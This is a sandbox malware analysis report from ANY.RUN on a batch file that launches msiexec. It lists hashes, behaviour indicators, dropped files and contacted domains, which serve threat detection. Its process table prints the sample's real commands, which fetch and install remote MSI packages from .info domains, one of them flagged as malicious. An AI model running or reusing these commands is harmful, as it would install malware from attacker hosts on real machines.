Malware analysis mlw_msiexec.bat Malicious activity | ANY.RUN

Add for printing

File name:	mlw_msiexec.bat
Full analysis:	https://app.any.run/tasks/29d5d556-9b8b-46aa-b83a-ca9e40d950e5
Verdict:	Malicious activity
Analysis date:	May 20, 2019, 14:34:13
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	8089B31551B33498458E0B1E585266C1
SHA1:	3E0C117CEF303BEF648CEB8B9CB5CE8E8CAB834E
SHA256:	FE3D88D5AB4D3FE56A6D311F87A8C72C0B36E4F942FE8649076197C42128BAC8
SSDEEP:	12:tPt92u926SY92Z92ghMYYciaCbyaevrCbZCbYB:tHjkgq1svJEg

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 240 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 180 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (73.0.3683.75)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Executed as Windows Service
  - vssvc.exe (PID: 2932)
- Executed via COM
  - DrvInst.exe (PID: 2384)
  - DrvInst.exe (PID: 1484)
  - DrvInst.exe (PID: 1256)
  - DrvInst.exe (PID: 3476)
- Executable content was dropped or overwritten
  - msiexec.exe (PID: 3900)
  - msiexec.exe (PID: 3468)
  - msiexec.exe (PID: 1740)
  - msiexec.exe (PID: 856)
  - msiexec.exe (PID: 1352)
- Application launched itself
  - taskmgr.exe (PID: 3144)
INFO
- Searches for installed software
  - msiexec.exe (PID: 3468)
- Writes to a desktop.ini file (may be used to cloak folders)
  - msiexec.exe (PID: 3468)
- Changes settings of System certificates
  - DrvInst.exe (PID: 2384)
- Adds / modifies Windows certificates
  - DrvInst.exe (PID: 2384)
- Low-level read access rights to disk partition
  - vssvc.exe (PID: 2932)
- Application launched itself
  - msiexec.exe (PID: 3468)
- Loads dropped or rewritten executable
  - MsiExec.exe (PID: 2956)
  - MsiExec.exe (PID: 2568)
  - MsiExec.exe (PID: 2456)
  - MsiExec.exe (PID: 3364)
  - MsiExec.exe (PID: 352)
  - MsiExec.exe (PID: 3652)
  - MsiExec.exe (PID: 2908)
- Manual execution by user
  - taskmgr.exe (PID: 3144)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
880	cmd /c ""C:\Users\admin\Desktop\mlw_msiexec.bat" "	C:\Windows\system32\cmd.exe	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1603 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3900	c:\windows\system32\msiexec.exe -package https://refreshnerer711rb.info/cltpMxmE8.65s	c:\windows\system32\msiexec.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1603 Version: 5.0.7600.16385 (win7_rtm.090713-1255)
3468	C:\Windows\system32\msiexec.exe /V	C:\Windows\system32\msiexec.exe		services.exe
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Version: 5.0.7600.16385 (win7_rtm.090713-1255)
2932	C:\Windows\system32\vssvc.exe	C:\Windows\system32\vssvc.exe	—	services.exe
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2384	DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot18" "" "" "6792c44eb" "00000000" "00000304" "000005C4"	C:\Windows\system32\DrvInst.exe	—	svchost.exe
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Driver Installation Module Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2956	C:\Windows\system32\MsiExec.exe -Embedding E13C7699CA185F52570F46DC51BBA40E	C:\Windows\system32\MsiExec.exe	—	msiexec.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255)
1740	c:\windows\system32\msiexec.exe -package https://superdomain1709.info/geeuier.foa	c:\windows\system32\msiexec.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1603 Version: 5.0.7600.16385 (win7_rtm.090713-1255)
1484	DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "00000000" "000004D8" "00000304"	C:\Windows\system32\DrvInst.exe	—	svchost.exe
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Driver Installation Module Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2568	C:\Windows\system32\MsiExec.exe -Embedding 9F85AD8E12F85ED7B2B61649D4E9B7AA	C:\Windows\system32\MsiExec.exe	—	msiexec.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255)
856	c:\windows\system32\msiexec.exe -package https://superdomain1709.info/kaebhgp.jng	c:\windows\system32\msiexec.exe		cmd.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 1603 Version: 5.0.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

2 003

Read events

1 091

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

387

Unknown types

Dropped files

PID	Process	Filename		Type
3468	msiexec.exe	C:\System Volume Information\SPP\metadata-2		—
		MD5:—	SHA256:—
3900	msiexec.exe	C:\Users\admin\AppData\Local\Temp\MSI238E.tmp		executable
		MD5:3DD7F786EC0AA5E4EC428D4E05962142	SHA256:A999262EBE9EE628EFA115E2CDE2A97DEEA2122B1227126782288EC9B678709B
3468	msiexec.exe	C:\System Volume Information\SPP\OnlineMetadataCache\{6172b762-3bbb-461e-a4f2-f771fb492e2f}_OnDiskSnapshotProp		binary
		MD5:3A2A5FA8504EE9BA9A633125CF2344E9	SHA256:85056AB7AE1C560051BCE4577045F14DFBA7E70AD0E326249E4ABCC76236091C
3468	msiexec.exe	C:\Windows\Installer\MSI2831.tmp		executable
		MD5:3DD7F786EC0AA5E4EC428D4E05962142	SHA256:A999262EBE9EE628EFA115E2CDE2A97DEEA2122B1227126782288EC9B678709B
3468	msiexec.exe	C:\System Volume Information\SPP\snapshot-2		binary
		MD5:3A2A5FA8504EE9BA9A633125CF2344E9	SHA256:85056AB7AE1C560051BCE4577045F14DFBA7E70AD0E326249E4ABCC76236091C
2384	DrvInst.exe	C:\Windows\INF\setupapi.ev1		binary
		MD5:E54B52DDBB254D04F7FCB86C62B55319	SHA256:77FF4E94624FFEFA79866C42223A618E23A35FCD7644F3BA7172D7E952A795AB
2384	DrvInst.exe	C:\Windows\INF\setupapi.dev.log		ini
		MD5:7B98D4D2FA6D5221F28FDC2DC29C3E52	SHA256:3E56934869FAFCBEACDAC1037A93FCB0A3C3925BABD25BEBC507E8542AA5A450
2384	DrvInst.exe	C:\Windows\INF\setupapi.ev3		binary
		MD5:76DCC60F78B3DFF1AE3627619074F465	SHA256:18541AC1875315C4F9EFF75050C574FAFF83717C029DAE6B366F9C6C3F0C19E0
3468	msiexec.exe	C:\Users\admin\AppData\Local\Temp\~DF0F5D5D757B33C435.TMP		—
		MD5:—	SHA256:—
3468	msiexec.exe	C:\Config.Msi\1262f9.rbs		—
		MD5:—	SHA256:—

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

No HTTP requests

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3468	msiexec.exe	104.18.56.47:443	superdomain711.info	Cloudflare Inc	US	shared
3468	msiexec.exe	104.18.53.93:443	refreshnerer711rb.info	Cloudflare Inc	US	shared
3900	msiexec.exe	104.18.56.47:443	superdomain711.info	Cloudflare Inc	US	shared
3900	msiexec.exe	104.18.53.93:443	refreshnerer711rb.info	Cloudflare Inc	US	shared
1352	msiexec.exe	104.27.161.100:443	superdomain1709.info	Cloudflare Inc	US	shared
856	msiexec.exe	104.27.161.100:443	superdomain1709.info	Cloudflare Inc	US	shared
3468	msiexec.exe	104.27.161.100:443	superdomain1709.info	Cloudflare Inc	US	shared
3468	msiexec.exe	104.18.52.207:443	refreshnerer711.info	Cloudflare Inc	US	shared
1740	msiexec.exe	104.27.161.100:443	superdomain1709.info	Cloudflare Inc	US	shared

DNS requests

Domain	IP	Reputation
refreshnerer711rb.info	104.18.53.93 104.18.52.93	malicious
superdomain711.info	104.18.56.47 104.18.57.47	suspicious
superdomain1709.info	104.27.161.100 104.27.160.100	unknown
refreshnerer711.info	104.18.52.207 104.18.53.207	suspicious

Threats

No threats detected

Add for printing

No debug info

General Info

mlw_msiexec.bat

8089B31551B33498458E0B1E585266C1

3E0C117CEF303BEF648CEB8B9CB5CE8E8CAB834E

FE3D88D5AB4D3FE56A6D311F87A8C72C0B36E4F942FE8649076197C42128BAC8

12:tPt92u926SY92Z92ghMYYciaCbyaevrCbZCbYB:tHjkgq1svJEg

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

SUSPICIOUS

Executed as Windows Service

Executed via COM

Executable content was dropped or overwritten

Application launched itself

INFO

Searches for installed software

Writes to a desktop.ini file (may be used to cloak folders)

Changes settings of System certificates

Adds / modifies Windows certificates

Low-level read access rights to disk partition

Application launched itself

Loads dropped or rewritten executable

Manual execution by user

Malware configuration

Static information

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings